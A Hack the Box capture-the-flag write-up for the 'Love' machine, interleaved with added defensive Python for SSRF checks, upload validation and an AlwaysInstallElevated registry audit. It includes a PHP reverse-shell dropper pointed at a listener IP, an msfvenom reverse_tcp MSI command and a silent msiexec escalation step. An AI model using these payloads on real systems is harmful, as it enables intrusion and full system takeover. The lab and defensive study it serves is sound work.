Welcome to my Love writeup
The Love machine can be found here: Hack the Box
Enumeration
Let's start with a full nmap scan against the Love machine:
```bash
nmap -A -p- -T4 -oA nmap <ip address>
```
Try the low-hanging fruit first, the SMB port. Unfortunately anonymous login is not possible, so let's move on to the web application.
In the SSL certificate we can see that the cert is also valid for a subdomain, staging.love.htb. To access the subdomain, add staging.love.htb to your hosts file and save it.
After this you can reach the staging site in your browser.
If you take a closer look you will see that port 5000 is open but cannot be reached from another network, so we abuse the scan-file function on staging.love.htb by giving it the following URL:
http://localhost:5000
The scanner fetches the internally available site on our behalf, and its response contains the admin credentials.
![staging.love.htb access internal webserver](https://it-tfuerst.de/wp-content/uploads/2021/05/2021-05-26_18-54.png)
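The scan-file function above is a classic server-side request forgery: the server fetches whatever URL it is handed, including services bound only to its own loopback interface. The following is an added example (not code from this writeup or from the voting system) of the destination check such a feature needs. The policy values (allowed schemes and ports) are assumptions; the core rule is that every address a target resolves to must be public.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical policy for a server-side "fetch this URL" feature (added
# example, not the voting system's own code): only http/https, only the
# default web ports, and never a destination that resolves to a loopback,
# private, link-local or otherwise non-public address.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host):
    """Resolve a hostname to every address it maps to (A and AAAA records)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_safe_scan_target(url, resolver=resolve_all):
    """Return (ok, reason) for a user-supplied URL.

    Rejects anything that would let the fetcher reach services that only
    listen on the server itself or inside its network (the port 5000 case).
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "no host in URL"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    port = port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"

    host = parts.hostname
    # Literal IPs are checked directly; names are resolved and every returned
    # address must be public (one private record is enough to reject).
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        if host.lower() == "localhost":
            return False, "localhost is never a valid target"
        resolved = resolver(host)
        if not resolved:
            return False, "unresolvable host"
        # Strip an IPv6 zone id such as %eth0 before parsing.
        addrs = [ipaddress.ip_address(a.split("%")[0]) for a in resolved]
    for addr in addrs:
        if not addr.is_global:
            return False, f"{addr} is not a public address"
    return True, "ok"


if __name__ == "__main__":
    for candidate in ("http://localhost:5000", "http://127.0.0.1/",
                      "http://10.10.10.10/", "http://93.184.216.34/"):
        print(candidate, is_safe_scan_target(candidate))
```

One caveat: validating and then fetching in two steps leaves a window for DNS rebinding, so the HTTP client should connect to the address that passed the check rather than resolving the name a second time, and it must re-run the check on every redirect it follows.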
Exploit and Userflag
With the newly found credentials visit the admin site on http://<love-machine ip>/admin. After a successful login we have the ability to upload a profile picture! Since this is a Windows box, be careful with the choice of your reverse shell.
![voting-system](https://it-tfuerst.de/wp-content/uploads/2021/05/upload-reverse-shell.png)
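The upload above works because the application accepts any file as a "profile picture" and stores it under a web root where PHP executes. As an added example (not the voting system's own code), here is the kind of server-side validation that closes that gap: a strict filename pattern, an extension allowlist, a magic-byte check against the declared type, a size limit, a scan for script markers, and a server-chosen storage name. The limits and the sample image bytes are constructed for the example.

```python
import os
import re
import secrets

# Hypothetical upload policy (added example, not the voting system's code).
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC = {
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    ".gif": [b"GIF87a", b"GIF89a"],
}
# Cheap heuristic for image/PHP polyglots; the real defence is storing
# uploads where the web server will never execute them.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script", re.IGNORECASE)

# Constructed sample: a PNG signature followed by filler, enough for the
# magic-byte check (not a real image).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def validate_upload(filename, data, max_bytes=2 * 1024 * 1024):
    """Return (ok, reason) for an uploaded profile picture."""
    name = os.path.basename(filename)          # drop any path component
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    # A single extension only: "shell.php.png" fails here because the stem
    # would still contain a dot.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False, "unexpected characters or extra dots in filename"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension {ext or '(none)'} not allowed"
    if len(data) > max_bytes:
        return False, "file too large"
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "content does not match declared image type"
    if SCRIPT_MARKERS.search(data):
        return False, "embedded script marker found"
    return True, "ok"


def storage_name(ext):
    """Server-chosen name; the client's filename is never reused on disk."""
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    print(validate_upload("avatar.png", SAMPLE_PNG))
    print(validate_upload("shell.php", b"<?php system($_GET['c']); ?>"))
    print(validate_upload("shell.php.png", SAMPLE_PNG))
```

Pair the check with web server configuration: keep the upload directory outside the document root, or at least disable script execution there (for Apache/XAMPP, `php_flag engine off` in that directory's .htaccess), so that a file which slips past validation is served as bytes rather than run.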
Here is the code of a reverse shell that works on the Love machine.
```php
<?php
header('Content-type: text/plain');
$ip = "10.10.10.10"; // change this to the IP of your listener
$port = "4444";      // change this to the port of your listener
// Base64-encoded, deflate-compressed Windows reverse shell executable
$payload = "7Vh5VFPntj9JDklIQgaZogY5aBSsiExVRNCEWQlCGQQVSQIJGMmAyQlDtRIaQGKMjXUoxZGWentbq1gpCChGgggVFWcoIFhpL7wwVb2ABT33oN6uDm+tt9b966233l7Z39779/32zvedZJ3z7RO1yQjgAAAAUUUQAL>
// Decode the executable and build its argument string
$evalCode = gzinflate(base64_decode($payload));
$evalArguments = " ".$port." ".$ip;
// Writable directory inside the web root of the voting system
$tmpdir = "C:\\xampp\\htdocs\\omrs\\images";
chdir($tmpdir);
$res = "";
$res .= "Using dir : ".$tmpdir;
// Write the executable to disk and run it
$filename = "D3fa1t_shell.exe";
$file = fopen($filename, 'wb');
fwrite($file, $evalCode);
fclose($file);
$path = $filename;
$cmd = $path.$evalArguments;
$res .= "\n\nExecuting : ".$cmd."\n";
echo $res;
$output = system($cmd);
?>
```
Launch a netcat listener to receive the connection. After this you can navigate to the user folder and grab the user flag.
Privilege Escalation
Privilege escalation is straightforward on this Love machine. Upload your preferred privilege escalation tool and look for misconfigurations.
You will notice the following misconfiguration:
![privilege escalation possibility](https://it-tfuerst.de/wp-content/uploads/2021/05/priv-esc-possibiliy.png)
To exploit this, create a reverse shell for the system with the following command:
```bash
msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=<your ip> LPORT=<your port> --encoder x64/xor --iterations 9 --format msi --out AlwaysInstallElevated.msi
```
Upload this payload and execute it with the following command after you have spawned a netcat listener to receive the connection.
```
msiexec /quiet /qn /i AlwaysInstallElevated.msi
```
You should have an elevated shell like in the screenshot.
![msfvenom payload with elevated shell](https://it-tfuerst.de/wp-content/uploads/2021/05/msfvenom-and-nc-authority-system.png)
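The misconfiguration used here is the AlwaysInstallElevated policy, which makes the Windows Installer run packages as SYSTEM for any user. It only takes effect when the value is set to 1 in both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer, so an audit has to look at both hives. The following is an added example (not from this writeup) that parses the output of `reg query ... /v AlwaysInstallElevated` for each hive and reports whether the host is exposed; the sample outputs are constructed, not captured from the Love machine.

```python
import re

# Constructed sample outputs of
#   reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#   reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# (added example; not output captured from the Love machine).
SAMPLE_HKLM = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU = r"""
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_MISSING = r"""
ERROR: The system was unable to find the specified registry key or value.
"""
SAMPLE_DISABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""

# One value line of reg query output: <name> <REG_TYPE> <data>
VALUE_LINE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(\S+)\s*$")


def parse_reg_query(text):
    """Map value names to (type, raw data) from `reg query` output.
    Key-path lines and error lines carry no REG_ type and are skipped."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def dword_is_one(values, name="AlwaysInstallElevated"):
    """True only for a REG_DWORD whose data (printed as 0x...) equals 1."""
    entry = values.get(name)
    if entry is None or entry[0] != "REG_DWORD":
        return False
    try:
        return int(entry[1], 16) == 1
    except ValueError:
        return False


def always_install_elevated_exposed(hklm_text, hkcu_text):
    """The policy is active only when BOTH hives set it to 1; a single hive
    on its own is a finding to clean up, but not an exposure."""
    return dword_is_one(parse_reg_query(hklm_text)) and \
        dword_is_one(parse_reg_query(hkcu_text))


if __name__ == "__main__":
    print("exposed:", always_install_elevated_exposed(SAMPLE_HKLM, SAMPLE_HKCU))
    print("exposed:", always_install_elevated_exposed(SAMPLE_HKLM, SAMPLE_MISSING))
```

The fix is to set both values to 0 (or remove them) via Group Policy under Windows Installer settings. For detection, the MsiInstaller source in the Application event log records the package path and the launching user for each installer transaction; a package started by an unprivileged user from a user-writable location such as a web root or a Temp directory is worth an alert.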
Root Flag
The reward is the root flag.
![root-flag from love-machine](https://it-tfuerst.de/wp-content/uploads/2021/05/root-flag.png)